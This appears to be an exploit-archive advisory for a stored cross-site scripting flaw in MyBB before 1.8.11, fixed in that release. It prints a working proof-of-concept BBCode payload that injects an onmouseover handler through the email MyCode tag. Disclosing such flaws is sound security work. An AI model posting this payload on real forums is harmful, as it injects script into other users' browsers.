MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting
| EKU-ID: 46058 | CVE: | OSVDB-ID: |
| Author: Zhiyang Zeng | Published: 2017-04-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 46058 | CVE: | OSVDB-ID: |
| Author: Zhiyang Zeng | Published: 2017-04-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerable version:<1.8.11 Severity:High risk =============== Proof of Concept: ============= 1.post a thread or reply any thread ,write: [email=2"onmouseover="alert(document.location)]hover me[/email] then when user’s mouse hover it,XSS attack will occur! ============ Fixed: ============ This vulnerability was fixed in version 1.8.11 https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ =============